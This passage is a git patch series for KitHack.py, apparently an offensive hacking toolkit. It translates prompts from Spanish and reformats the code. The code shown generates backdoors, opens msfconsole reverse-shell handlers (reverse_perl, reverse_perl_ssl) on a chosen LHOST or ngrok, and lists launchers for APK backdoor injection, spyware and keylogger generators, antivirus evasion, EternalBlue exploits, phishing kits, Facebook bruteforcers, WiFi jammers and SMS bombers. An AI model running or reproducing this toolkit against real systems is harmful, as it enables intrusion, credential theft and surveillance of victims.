continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -4119,7 +4109,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -4127,24 +4117,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.pl'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -4152,7 +4142,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -4160,31 +4150,31 @@ def main(): location = os.getcwd() if os.stat('output/{}.pl'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -4197,14 +4187,14 @@ def main(): LPORT = "443" # continue os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {}; set LPORT {}; set PAYLOAD {}; exploit\'"'.format(LHOST, LPORT, PAYLOAD)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -4214,14 +4204,14 @@ def main(): main() elif option == '12': - pause("\n{}Presione cualquier tecla para salir...".format(GREEN)) + pause("\n{}Press any key to exit...".format(GREEN)) time.sleep(1) os.system('clear') print(exit_main) exit(0) else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) os.system('clear') main() @@ -4233,7 +4223,7 @@ def main(): main() except KeyboardInterrupt: - choice = input('\n\n{0}[1] {1}Return KitHack {0}[2] {1}Exit \n{2}KitHack >> {1}'.format(GREEN, DEFAULT, RED)) + choice = input('\n\n{0}[1] {1}Return to KitHack {0}[2] {1}Exit \n{2}KitHack >> {1}'.format(GREEN, DEFAULT, RED)) choice = choice.zfill(2) if choice == '01': if os.path.isfile('/usr/local/bin/kithack'): @@ -4247,6 +4237,6 @@ def main(): print(exit_main) exit(0) else: - print("\n{}[x] Opcion invalida.".format(RED)) + print("\n{}[x] INVALID OPTION.".format(RED)) time.sleep(2) exit(0) From 9788ac2eddc7cf70da632be9e90adc65361d0e3b Mon Sep 17 00:00:00 2001 From: "Restyled.io" Date: Sat, 26 Feb 2022 22:14:06 +0000 Subject: [PATCH 2/6] Restyled by autopep8 --- KitHack.py | 9569 +++++++++++++++++++++++++++++----------------------- 1 file changed, 5342 insertions(+), 4227 deletions(-) diff --git a/KitHack.py b/KitHack.py index 0dccf46..fe68965 100755 --- a/KitHack.py +++ b/KitHack.py @@ -1,4242 +1,5357 @@ #!/usr/bin/python3 # -*- coding: utf-8 -*- -#Copyright 2021 KITHACK -#Written by: Adrian Guillermo -#Facebook: https://facebook.com/adrian.guillermo.22 -#Github: https://github.com/AdrMXR - +# Copyright 2021 KITHACK +# Written by: Adrian Guillermo +# Facebook: https://facebook.com/adrian.guillermo.22 +# Github: https://github.com/AdrMXR + +from getch import pause +from sys import exit +import requests +import os +from lib.network import run_network +from lib import kitools +from lib.banners import * +from tkinter import Tk, filedialog +import webbrowser +import time +import subprocess +import sys BLUE, RED, WHITE, CYAN, DEFAULT, YELLOW, MAGENTA, GREEN, END, BOLD = '\33[94m', '\033[91m', '\33[97m', '\033[36m', '\033[0m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m', '\033[1m' -import sys -import os -import subprocess -import time -import requests -import webbrowser -from sys import exit -from getch import pause -from tkinter import Tk, filedialog -from lib.banners import * -from lib import kitools -from lib.network import run_network def check_connection(host='https://www.google.com'): - print("{}Checking your internet connection...".format(GREEN)) - time.sleep(0.5) - try: - req = requests.get(host, timeout=15) - if req.status_code == 200: - print("{}Internet connection successful.".format(GREEN)) - time.sleep(0.5) - pass - except: - print("{0}[x]:{1} Check your internet connection.".format(RED, DEFAULT)) - exit(0) + print("{}Checking your internet connection...".format(GREEN)) + time.sleep(0.5) + try: + req = requests.get(host, timeout=15) + if req.status_code == 200: + print("{}Internet connection successful.".format(GREEN)) + time.sleep(0.5) + pass + except: + print("{0}[x]:{1} Check your internet connection.".format(RED, DEFAULT)) + exit(0) -def check_permissions(): - if os.getuid() == 0: - info() - else: - os.system('clear') - print("{0}[!]{1} ¡Permission denied! Remember to run: {2}sudo {1}python3 KitHack.py".format(RED, DEFAULT, GREEN)) - exit(0) -def info(): - os.system('clear') - print("{0}[VERSION]:{1} 1.3.2\n\n".format(RED, DEFAULT)) - time.sleep(0.5) - os.system('clear') - -def main(): - print(start_main_menu) - option = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - option = option.zfill(2) - - if option == '01': - os.system('clear') - print ('========={0}Tool{1}==================================={0}Information{1}================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} Backdoor-apk {2}Add a backdoor to any APK file.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Evil-Droid {2}Android Backdoor Generator Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Spade {2}APK Backdoor Tool Made in Python.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} AhMyth {2}Android Remote Administration Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Andspoilt {2}Run interactive Android exploits on Linux.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Kwetza {2}Inject malware into existing Android apps.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Termux {2}Linux based Android terminal emulator.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Android-Exploits {2}Collection of Android exploits and hacks.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Grabcam {2}Allows to hack the camera of our victims with a fake page.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Androidpatternlock {2}Allows to get the pattern lock on Android devices.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.BackdoorApk() - - elif tool == '02': - kitools.EvilDroid() - - elif tool == '03': - kitools.Spade() - - elif tool == '04': - kitools.AhMyth() - - elif tool == '05': - kitools.Andspoilt() - - elif tool == '06': - kitools.Kwetza() - - elif tool == '07': - kitools.Termux() - - elif tool == '08': - kitools.AndroidExploits() - - elif tool == '09': - kitools.Grabcam() - - elif tool == '10': - kitools.AndroidPatternLock() - - else: - print("\n{}[X] INVALID OPTION".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '02': - os.system('clear') - print ('========{0}Tool{1}================================================{0}Information{1}==================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} Winpayloads {2}Undetectable payload generator in Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} sAINT {2}Spyware generator for Windows systems.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} BeeLogger {2}Gmail Keylogger Generator for Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} FakeImageExploiter {2}Inject malware into jpg images for Windows.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Koadic {2}Post-Exploit Windows Rootkit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Phantom Evasion {2}Antivirus Evasion Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Ps1encode {2}PowerShell-based payload generator and encoder.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} DKMC {2}Malicious Payload Evasion Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Cromos {2}Inject code into legitimate Chrome Web extensions.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Eternal_scanner {2}Scanner for Eternal Blue and Eternal Romance exploit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} EternalblueDoublepulsar {2}Metasploit module to exploit the Eternalblue-Doublepulsar vulnerability.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} EternalBlueWinXPWin10 {2}Metasploit Module for EternalBlue from Windows XP SP2 to Windows 10 Pro.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Windows-Exploits {2}Windows Exploits Collection.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.Winpayloads() - - elif tool == '02': - kitools.sAINT() - - elif tool == '03': - kitools.BeeLogger() - - elif tool == '04': - kitools.FakeImageExploiter() - - elif tool == '05': - kitools.Koadic() - - elif tool == '06': - kitools.PhantomEvasion() - - elif tool == '07': - kitools.Ps1encode() - - elif tool == '08': - kitools.DKMC() - - elif tool == '09': - kitools.Cromos() - - elif tool == '10': - kitools.EternalScanner() - - elif tool == '11': - kitools.EternalblueDoublepulsarMetasploit() - - elif tool == '12': - kitools.MS17010EternalBlueWinXPWin10() - - elif tool == '13': - kitools.WindowsExploits() - - else: - print("\n{}[X] INVALID OPTION".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '03': - os.system('clear') - print ('======={0}Tool{1}======================================={0}Information{1}====================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} HiddenEye {2}Modern phishing tool with advanced functionality.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} PhishX {2}Phishing and Spoofing Generator.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} SocialPhish {2}Phishing tool with 32 templates + 1 customizable.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} SocialFish {2}Phishing educational tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} PhisherMan {2}Phishing tool with 17 templates and working with ngrok.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Spectre {2}Supports phishing attacks with almost any website.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Blackeye {2}Phishing tool with 38 websites available.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} PhEmail {2}Automate phishing email delivery processes.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Weeman {2}HTTP Server for Phishing.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Zphisher {2}Automated phishing tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} AIOPhish {2}Phishing tool with different options.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.HiddenEye() - - elif tool == '02': - kitools.PhishX() - - elif tool == '03': - kitools.SocialPhish() - - elif tool == '04': - kitools.SocialFish() - - elif tool == '05': - kitools.PhisherMan() - - elif tool == '06': - kitools.Spectre() - - elif tool == '07': - kitools.Blackeye() - - elif tool == '08': - kitools.PhEmail() - - elif tool == '09': - kitools.Weeman() - - elif tool == '10': - kitools.Zphisher() - - elif tool == '11': - kitools.AIOPhish() - - else: - print("\n{}[X] INVALID OPTION".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '04': - os.system('clear') - print ('======={0}Tool{1}====================================={0}Information{1}======================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} Fluxion {2}Network Auditing/Social Engineering Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Wifiphisher {2}WiFi Password Capture Tool Using AP.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Wifibroot {2}WPA/WPA2 WiFi Penetration Testing Tool. '.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Wifite {2}Run existing wireless auditing tools for you.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Ettercap {2}Interceptor/sniffer/logger for switched LANs .'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} Linset {2}WPA/WPA2 Phishing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} WiFi-Pumpkin {2}AP framework to easily create fake networks.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Wifresti {2}Find your wireless network password on Windows, Linux and Mac OS.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Evil Limiter {2}Device bandwidth limiting tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Netool-toolkit {2}MitM pentesting open source toolkit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} Dracnmap {2}Tool used to exploit networks and collect data with NMAP.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} Airgeddon {2}Bash script to audit wireless networks.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Routersploit {2}Router Penetration Testing Modules.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} Eaphammer {2}Kit to perform targeted attacks against WPA2-Enterprise networks.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} VMR-MDK {2}Script to decrypt WPS wireless networks.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}16){1} Wirespy {2}Allows you to configure fast honeypots to carry out MITM.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}17){1} Wireshark {2}Network Capture/Analyzing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}18){1} SniffAir {2}Wireless Pentesting Framework.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}19){1} WifiJammer {2}WiFi Client/Router Jammer.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}20){1} KawaiiDeauther {2}WiFi DeAuth Attack Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.Fluxion() - - elif tool == '02': - kitools.Wifiphisher() - - elif tool == '03': - kitools.Wifibroot() - - elif tool == '04': - kitools.Wifite() - - elif tool == '05': - kitools.Ettercap() - - elif tool == '06': - kitools.Linset() - - elif tool == '07': - kitools.WiFiPumpkin() - - elif tool == '08': - kitools.Wifresti() - - elif tool == '09': - kitools.EvilLimiter() - - elif tool == '10': - kitools.NetoolToolkit() - - elif tool == '11': - kitools.Dracnmap() - - elif tool == '12': - kitools.Airgeddon() - - elif tool == '13': - kitools.Routersploit() - - elif tool == '14': - kitools.Eaphammer() - - elif tool == '15': - kitools.VMRMDK() - - elif tool == '16': - kitools.Wirespy() - - elif tool == '17': - kitools.Wireshark() - - elif tool == '18': - kitools.SniffAir() - - elif tool == '19': - kitools.WifiJammer() - - elif tool == '20': - kitools.KawaiiDeauther() - - else: - print("\n{}[X] INVALID OPTION".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '05': - os.system('clear') - print ('======={0}Tool{1}====================================={0}Information{1}================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} Cupp {2}Allows you to create dictionaries specifically for a person.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Facebooker {2}Facebook Password Bruteforcer Made in Perl.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} BluForce-FB {2}Facebook Password Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Brut3k1t {2}Bruteforce Attack Kit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} SocialBox {2}Bruteforce Framework.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} John The Ripper {2}Password Bruteforcing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Hashcat {2}Hash Cracking Toolkit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Brutedum {2}SSH/FTP/Telnet/PostgreSQL/RDP/VNC/Medusa Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Facebash {2}Facebook Bruteforcer Made in Shellscript Using TOR.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Brutespray {2}Port Scanner/Bruteforcer.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} Pupi {2}Password Generator Using Personal Information.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} B4r-brute {2}Facebook Account Cracker Using User ID.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Fb-Hack {2}Facebook Password "Hack"/Recovery Script.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.Cupp() - - elif tool == '02': - kitools.Facebooker() - - elif tool == '03': - kitools.BluForceFB() - - elif tool == '04': - kitools.Brut3k1t() - - elif tool == '05': - kitools.SocialBox() - - elif tool == '06': - kitools.JohnTheRipper() - - elif tool == '07': - kitools.Hashcat() - - elif tool == '08': - kitools.Brutedum() - - elif tool == '09': - kitools.Facebash() +def check_permissions(): + if os.getuid() == 0: + info() + else: + os.system('clear') + print("{0}[!]{1} ¡Permission denied! Remember to run: {2}sudo {1}python3 KitHack.py".format( + RED, DEFAULT, GREEN)) + exit(0) - elif tool == '10': - kitools.Brutespray() - elif tool == '11': - kitools.Pupi() - - elif tool == '12': - kitools.B4rbrute() - - elif tool == '13': - kitools.FbHack() - - else: - print("\n{}[X] INVALID OPTION".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '06': - os.system('clear') - print ('======={0}Tool{1}========================================={0}Information{1}========================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} SQLmap {2}SQLi Penetration Testing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} XAttacker {2}Website Vulnerability Scanner.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Fuxploider {2}Detect favorable techniques to load web shells or any malicious files.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Wordpresscan {2}WordPress Vulnerability Scanner.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} SiteBroker {2}Information Collecting/Website Penetration Testing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} NoSQLMap {2}NoSQL Default Configuration Weakness Exploitation Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} Sqli-scanner {2}SQL Injection Vulnerability Scanner.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Joomscan {2}Website Misconfiguration Scanner.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} Metagoofil {2}Metadata Extraction Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} Sublist3r {2}Subdomain Enumeration Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} WAFNinja {2}Web Application Firewall Attacker.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} Dirsearch {2}Directory/File Path Bruteforcing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} XSStrike {2}Advanced XSS Scanner.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} LinksF1nd3r {2}Web Component Extractor.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} D-TECT {2}Modern Website Penetration Testing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}16){1} Phpsploit {2}Tool capable of maintaining access to a compromised web server.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.SQLmap() - - elif tool == '02': - kitools.XAttacker() - - elif tool == '03': - kitools.Fuxploider() - - elif tool == '04': - kitools.Wordpresscan() - - elif tool == '05': - kitools.SiteBroker() - - elif tool == '06': - kitools.NoSQLMap() - - elif tool == '07': - kitools.SqliScanner() - - elif tool == '08': - kitools.Joomscan() - - elif tool == '09': - kitools.Metagoofil() - - elif tool == '10': - kitools.Sublist3r() - - elif tool == '11': - kitools.WAFNinja() - - elif tool == '12': - kitools.Dirsearch() - - elif tool == '13': - kitools.XSStrike() - - elif tool == '14': - kitools.LinksF1nd3r() - - elif tool == '15': - kitools.DTECH() - - elif tool == '16': - kitools.Phpsploit() - - else: - print("\n{}[X] INVALID OPTION".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '07': - os.system('clear') - print ('======={0}Tool{1}====================================={0}Information{1}=================================='.format(GREEN, DEFAULT)) - print ('{0}01){1} SpoofMAC {2}MAC Address Spoofing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Ip_spoofing {2}ARP/HTTP Spoofing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} Arpspoof {2}ARP Spoofing Attacl Tool Using Linux Kernel Sockets.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} DerpNSpoof {2}Simple DNS Spoofing Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} DrSpoof {2}ARP Spoofing Detection Tool For Local Networks.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} GODKILLER {2}SMS Bomber/Sender.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.SpoofMAC() - - elif tool == '02': - kitools.IpSpoofing() - - elif tool == '03': - kitools.Arpspoof() - - elif tool == '04': - kitools.DerpNSpoof() - - elif tool == '05': - kitools.DrSpoof() - - elif tool == '06': - kitools.GODKILLER() +def info(): + os.system('clear') + print("{0}[VERSION]:{1} 1.3.2\n\n".format(RED, DEFAULT)) + time.sleep(0.5) + os.system('clear') - else: - print("\n{}[X] INVALID OPTION".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - elif option == '08': - os.system('clear') - print ('========={0}Tool{1}========================================{0}Information{1}========================================'.format(GREEN, DEFAULT)) - print ('{0}01){1} NMAP {2}Network Scanning Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}02){1} Th3inspector {2}AIO Information Gathering Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}03){1} FBI {2}Collection of sensitive information on Facebook accounts.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}04){1} Infoga {2}Email Information Extraction Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}05){1} Crips {2}IP Address/Website/DNS Record Lookup Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}06){1} BillCipher {2}Website/IP Address Information Lookup Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}07){1} RED_HAWK {2}Tool to collect information, scan vulnerabilities and trace.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}08){1} Recon-ng {2}Information Gathering Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}09){1} theHarvester {2}Collection of emails, names, subdomains, IP addresses and URLs.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}10){1} PhoneInfoga {2}Phone Number Information Lookup Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}11){1} Gasmask {2}AIO Information Gathering Tool #2.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}12){1} URLextractor {2}Website Information Gathering/Reconnaissance Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}13){1} Devploit {2}Website DNS/WhoIS/IP/GeoIP/Subnet/Port/Host Lookup Tool'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}14){1} ReconDog {2}AIO Basic Information Gathering Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}15){1} Webkiller {2}Information Collection Kit.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}16){1} Quasar {2}Information Collection Framework.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}17){1} Info-instagram {2}Instagram Information Extraction Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}18){1} UserScan {2}Username Lookup/Identity Scanner Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}19){1} XCTR-Hacking {2}AIO Information Gathering Tool #3.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}20){1} DeadTrap {2}Phone Number OSINT Tool.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) - - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.NMAP() - - elif tool == '02': - kitools.Th3inspector() - - elif tool == '03': - kitools.FBI() - - elif tool == '04': - kitools.Infoga() - - elif tool == '05': - kitools.Crips() - - elif tool == '06': - kitools.BillCipher() - - elif tool == '07': - kitools.RedHawk() - - elif tool == '08': - 